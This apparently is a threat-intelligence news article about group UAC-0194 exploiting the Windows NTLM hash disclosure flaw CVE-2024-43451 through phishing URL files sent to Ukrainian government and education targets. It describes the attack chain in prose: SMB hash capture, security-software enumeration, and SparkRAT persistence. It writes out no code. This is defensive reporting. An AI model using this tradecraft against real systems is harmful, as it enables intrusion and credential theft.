UAC-0194’s Exploitation of CVE-2024-43451 in Ukraine for Phishing

The UAC-0194 cyber threat group, suspected to have Russian affiliations, has been linked to a series of attacks exploiting the recently patched Windows vulnerability CVE-2024-43451, primarily targeting Ukrainian entities. The vulnerability, a critical NTLM Hash Disclosure flaw, was identified by security researchers at ClearSky and involves user interaction with URL files that connect to external servers. “When the user interacts with the URL file by right-clicking, deleting, or moving it, the vulnerability is triggered,” ClearSky explained. Adding that a Ukrainian government server distributed phishing emails containing malicious URL files. These emails urged recipients to interact with the file under the pretense of renewing academic certificates, eventually leading to the execution of unauthorized commands. ClearSky shared its findings with CERT-UA, the Ukrainian Computer Emergency Response Team, which identified UAC-0194 as responsible for distributing these files to the Ukrainian government and educational entities. Microsoft released a security patch for CVE-2024-43451 as part of the November 2024 Patch Tuesday update.

The attack chain, identified and reported in part by CERT-UA, begins with a phishing email from a compromised Ukrainian government server. This email links to a URL file that, upon interaction, initiates a connection to an external server using the SMB protocol to retrieve executable (EXE) files. “The Ukrainian CERT revealed that the URL file is propagated as part of a campaign by threat actor UAC-0194, suspected as Russian, that targets entities in Ukraine,” ClearSky notes. By capturing the NTLM hashes via the SMB connection, attackers could later use these hashes in pass-the-hash attacks or attempt to retrieve the plaintext passwords, granting further unauthorized access to targeted systems.

An attack shared by CERT-UA reports the execution of a URL file, an executable file masquerading as a certificate, prompts the users that the certificate was "activated, and the information has been sent to the governmental certification system." However, a .cmd file is then dropped that enumerates running processes with 'tasklist' and searches for security software using the “findstr” command. This enumeration allows attackers to check for antivirus or security monitoring tools such as Avast, Norton, and Sophos. The final stages of the attack involve deploying the SparkRAT malware via AutoIT, establishing persistence under the name "Wave360 Sync Technologies Co\SyncWave360.js" and placing the same script in the Startup folder. SparkRAT, an open-source remote access tool, communicates with a command-and-control server on port 8000, allowing the attackers ongoing access to the compromised systems.

This targeted exploitation of CVE-2024-43451 emphasizes a pressing need for entities to apply Microsoft's recent security patch and reinforces CERT-UA's advisory on the threat posed by UAC-0194 to Ukrainian infrastructure.